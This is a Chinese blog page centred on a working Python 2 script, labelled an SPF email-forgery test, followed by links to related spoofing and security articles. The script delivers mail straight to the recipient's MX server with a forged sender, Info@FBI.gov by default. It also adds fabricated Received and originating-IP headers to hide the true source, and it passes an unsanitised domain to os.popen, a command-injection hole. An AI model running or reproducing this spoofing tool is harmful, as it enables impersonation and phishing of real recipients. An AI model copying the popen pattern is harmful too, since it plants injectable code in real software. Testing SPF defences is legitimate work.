测试脚本:

# -*- coding: utf-8 -*-

import socket,select,base64,os,re,time,datetime

class mail:

    def __init__(self):

        self.errmsg = ''

    def send(self, buf):

        try:

            byteswritten = 0

            while byteswritten < len(buf):

                byteswritten += self.__sockfd.send(buf[byteswritten:])

        except:

            pass

    def recvline(self, strline):

        detect_fds = [self.__sockfd,]

        rrdy, wrdy, erdy = select.select(detect_fds, [], [], 20)

        if len(rrdy) == 0:

            return False

        else:

            while True:

                try:

                    strtmp = self.__sockfd.recv(1)

                    strline[0] += strtmp[0]

                    if(strtmp[0] == '\n'):

                        print 'server : '+strline[0]

                        break

                except:

                    return False

            return True

    def getresp(self, resp_str):

        while True:

            if(self.recvline(resp_str) == False):

                return False

            else:

                if resp_str[0][3] != '-':

                    break;

        return True

    def mailhelo(self, hostname):

        self.send('helo %s\r\n'%hostname)

        print 'host say: helo %s'%hostname

        resp_str = ['',]

        if(self.getresp(resp_str) == False):

            return False

        if resp_str[0][0:3] == '250':

            return True

        else:

            self.errmsg = resp_str[0]

            return False

    def mailfrom(self, fromstr):

        self.send('mail from: <%s>\r\n'%fromstr)

        print 'host say: mail from: <%s>'%fromstr

        resp_str = ['',]

        if(self.getresp(resp_str) == False):

            return False

        if resp_str[0][0:3] == '250':

            return True

        else:

            self.errmsg = resp_str[0]

            return False

    def mailto(self, tostr):

        self.send('rcpt to: <%s>\r\n'%tostr)

        print 'host say: rcpt to: <%s>'%tostr

        resp_str = ['',]

        if(self.getresp(resp_str) == False):

            return False

        if resp_str[0][0:3] == '250':

            return True

        else:

            self.errmsg = resp_str[0]

            return False

    def maildata(self):

        self.send('data\r\n')

        print 'host say: data'

        resp_str = ['',]

        if(self.getresp(resp_str) == False):

            return False

        if resp_str[0][0:3] == '354':

            return True

        else:

            self.errmsg = resp_str[0]

            return False

    def mailbody(self, bodystr):

        print 'host say: '+'.for <'+self.To+'>; '+time.strftime("%a, %d %b %Y %H:%M:%S +0800 (CST)",time.localtime())+'\r\n'

        print 'host say: '+'From: "=?GB2312?B?zfU=?=" <'+self.From+'>\r\n'

        print 'host say: '+'Subject:'+self.Subject+'?=\r\n'

        print 'host say: '+'To: <'+self.To+'>\r\n'

        print 'host say: '+bodystr

        self.send('Received: from ICE (unknown [8.8.8.8])\r\n')

        self.send('.by 8.8.8.8 (Coremail) with SMTP id _bJCALesoEAeAFMU.1\r\n')

        self.send('.for <'+self.To+'>; '+time.strftime("%a, %d %b %Y %H:%M:%S +0800 (CST)",time.localtime())+'\r\n')

        self.send('X-Originating-IP: [8.8.8.8]\r\n')

        self.send('Date: '+time.strftime("%a, %d %b %Y %H:%M:%S +0800",time.localtime())+'\r\n')

        self.send('From: '+self.FromName+ '<'+self.From+'>\r\n')

        self.send('Subject: '+self.Subject+'\r\n')

        self.send('To: <'+self.To+'>\r\n')

        self.send('X-Priority: 1\r\n')

        self.send('X-mailer: iceMail 1.0 [cn]\r\n')

        self.send('Mime-Version: 1.0\r\n')

        self.send('Content-Type: text/plain;\r\n')

        self.send('.charset="GB2312"\r\n')

        self.send('Content-Transfer-Encoding: quoted-printable\r\n\r\n')

        self.send(bodystr)

        self.send('\r\n.\r\n')

        resp_str = ['',]

        if(self.getresp(resp_str) == False):

            return False

        if resp_str[0][0:3] == '250':

            return True

        else:

            self.errmsg = resp_str[0]

            return False

    def mailquit(self):

        self.send('quit\r\n')

        print 'host say: quit'

        resp_str = ['',]

        if(self.getresp(resp_str) == False):

            return False

        if resp_str[0][0:3] == '221':

            print 'server : Bye'

            print 'mail send ok'

            return True

        else:

            self.errmsg = resp_str[0]

            return False

    def txmail(self, hostname, mailfrom, rcptto, bodystr):

        mx_server_list = []

        mail_postfix = re.split('@',rcptto)

        #print mail_postfix

        try:

            outstr = os.popen('nslookup -type=mx -timeout=10 %s'%mail_postfix[1], 'r').read()

        except Exception, e:

            print 'DEBUG: Execute nslookup:',e

            return False

        linestr = re.split('\n', outstr)

        for s in linestr:

            if re.match('.+[ |\t]mail exchanger[ |\t].+', s) != None:

                c = re.split(' |\t', s)

                mx_server_list.append(c[len(c) - 1])

        if len(mx_server_list) == 0:

            self.errmsg = 'Can not find MX server'

            return False

        for mx_element in mx_server_list:

            return_val = True

            mx_server_ip = socket.gethostbyname(mx_element)

            tx_sockfd = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)

            try:

                tx_sockfd.connect((mx_server_ip, 25))

                self.__sockfd = tx_sockfd

                resp_str = ['',]

                self.getresp(resp_str)

                if self.mailhelo(hostname) and self.mailfrom(mailfrom) \

                     and self.mailto(rcptto) and self.maildata() and self.mailbody(bodystr) and self.mailquit():

                    pass

                else:

                    return_val = False

            except Exception, e:

                return_val = False

            try:

                tx_sockfd.close()

            except:

                pass

            if return_val == True:

                break

        return return_val

    def sendMail(self):

        self.StmpHost=self.From.split("@")[1]

        self.txmail(self.StmpHost, self.From, self.To, self.Data)

if __name__ == '__main__':

    icemail=mail()

    icemail.Port=25

    icemail.To='YourEmail@163.com'

    icemail.From='Info@FBI.gov'

    icemail.FromName='邮件伪造漏洞测试'

    icemail.Subject='邮件伪造漏洞测试'

    icemail.Data='邮件伪造漏洞测试'

    icemail.sendMail()

SPF邮件伪造漏洞测试脚本的更多相关文章

  1. Swaks绕过SPF验证进行邮件伪造

    0x00 swaks简介 Swaks是一个功能强大,灵活,可编写脚本,面向事务的SMTP测试工具,由John Jetmore编写和维护. 目前Swaks托管在私有svn存储库中.官方项目页面是http ...

  2. 邮件伪造测试-Swaks

    1. 前言 在kali中自带一个邮件伪造工具Swaks,工具项目主页为 http://jetmore.org/john/code/swaks 2.基本用法: swaks --to --from --e ...

  3. SPF难以解决邮件伪造的现状以及方案

    邮件伪造的现状 仿冒域名 私搭邮服仿冒域名: 例如某公司企业的域名是example.com,那么攻击者可以搭建一个邮服,也把自己的域名配置为example.com,然后发邮件给真实的企业员工xxx@e ...

  4. 编写自己的Acunetix WVS漏洞扫描脚本详细教程

    AWVS提供了自定义的脚本编程接口,可是网上的资料很少,只有官方的几篇介绍和参考手册,最近研究了一下怎么编写AWVS的漏洞脚本来写一篇简单性的文章 本文以8.0为例,首先呢安装好Acunetix We ...

  5. WordPress HMS Testimonials 多个跨站脚本漏洞和跨站请求伪造漏洞

    漏洞名称: WordPress HMS Testimonials 多个跨站脚本漏洞和跨站请求伪造漏洞 CNNVD编号: CNNVD-201308-199 发布时间: 2013-08-22 更新时间: ...

  6. WordPress A Forms插件HTML注入漏洞和跨站请求伪造漏洞

    漏洞名称: WordPress A Forms插件HTML注入漏洞和跨站请求伪造漏洞 CNNVD编号: CNNVD-201308-281 发布时间: 2013-08-20 更新时间: 2013-08- ...

  7. 点击劫持漏洞之理解 python打造一个挖掘点击劫持漏洞的脚本

    前言: 放假了,上个星期刚刚学习完点击劫持漏洞.没来的及写笔记,今天放学总结了一下 并写了一个检测点击劫持的脚本.点击劫持脚本说一下哈.= =原本是打算把网站源码 中的js也爬出来将一些防御的代码匹配 ...

  8. CSRF 漏洞测试

    CSRF简介: CSRF中文名:跨站请求伪造,英文译为:Cross-site request forgery,CSRF攻击就是attacker(攻击者)利用victim(受害者)尚未失效的身份认证信息 ...

  9. JMeter http(s)测试脚本录制器的使用

    JMeter http(s)测试脚本录制器的使用 by:授客 QQ:1033553122 http(s) Test Script Recorder允许Jmeter在你使用普通浏览器浏览web应用时,拦 ...

随机推荐

  1. setValue:forUndefinedKey this class is not key value coding-compliant for the key

    下午开发过程中遇到一个错误,结果被的真惨,从上午 11 点查错一直查到下午 2 点才找到错误的原因,真的郁闷的不行. 关于查错这么久,主要的原因是:   1. 自己对 IOS 开发还不熟悉2. 不知道 ...

  2. 解决升级Win 10 IP 10122后无法调试UAP应用的方法

    可能各位也像老周一样,第一时间升级了Build 10122,但不知道大家有没有发现,当你升级后,写一个UAP应用,要调试运行时,就会出错,错误如下: DEP0730 : 注册应用程序失败,因为目标计算 ...

  3. 收集的React.JS资料

    主页 http://facebook.github.io/react/ https://github.com/facebook/react   中文站 http://www.reactjs.cn/ h ...

  4. MVC5 网站开发实践 2.1、管理员登陆

    目录 MVC5 网站开发实践  概述 MVC5 网站开发实践  1.建立项目 MVC5 网站开发实践  2.后台管理   1. 创建SHA256加密方法. 在Data项目中添加文件夹[Security ...

  5. ASP.NET MVC Web API Post FromBody(Web API 如何正确 Post)

    问题场景: ASP.NET MVC Web API 定义 Post 方法,HttpClient 使用 JsonConvert.SerializeObject 传参进行调用,比如 Web Api 中定义 ...

  6. C#基于两种需求向图片添加水印

    使用场景 1.也就是大家经常用的,一般是图片的4个角落,基于横纵坐标来添加. 2.在图片内基于固定位置,文字始终居中.刚开始我基于第一种场景来根据水印汉字的长度来计算坐标,后来发现方法始终不可靠.现在 ...

  7. 【JavaScript】又一神器框架:linq.js

    引言 前几天针对一个js数组交集的问题请教了下同事,他第一反应就是循环,这也是常规思路,因为我个人更倾向于js些,我便开玩笑,不知道js能不能像linq那样实现这些操作呢?果断百度了一把,果然有现成框 ...

  8. HTTP图解(大牛必经之路)

    本节内容 俗话说好的开发,底层知识必须过硬,不然再创新的技术,你也理解不深入,比如python web开发工程师,想要学习任何一个框架,底层都是http和socket,底层抓牢了,学起来会很轻松,所以 ...

  9. Ajax提交参数的值中带有html标签不能提交成功的解决办法(ASP.NET)

    最近在公司做资源及文章上传功能遇到一个小问题,被坑了好半天. 该功能就类似利用富文本编辑器发布信息,但是用Ajax提交数据,因此提交参数值中不可避免的含有html标签. 在本地运行代码一直没问题,总是 ...

  10. RabbitMQ原理与相关操作(三)消息持久化

    现在聊一下RabbitMQ消息持久化: 问题及方案描述 1.当有多个消费者同时收取消息,且每个消费者在接收消息的同时,还要处理其它的事情,且会消耗很长的时间.在此过程中可能会出现一些意外,比如消息接收 ...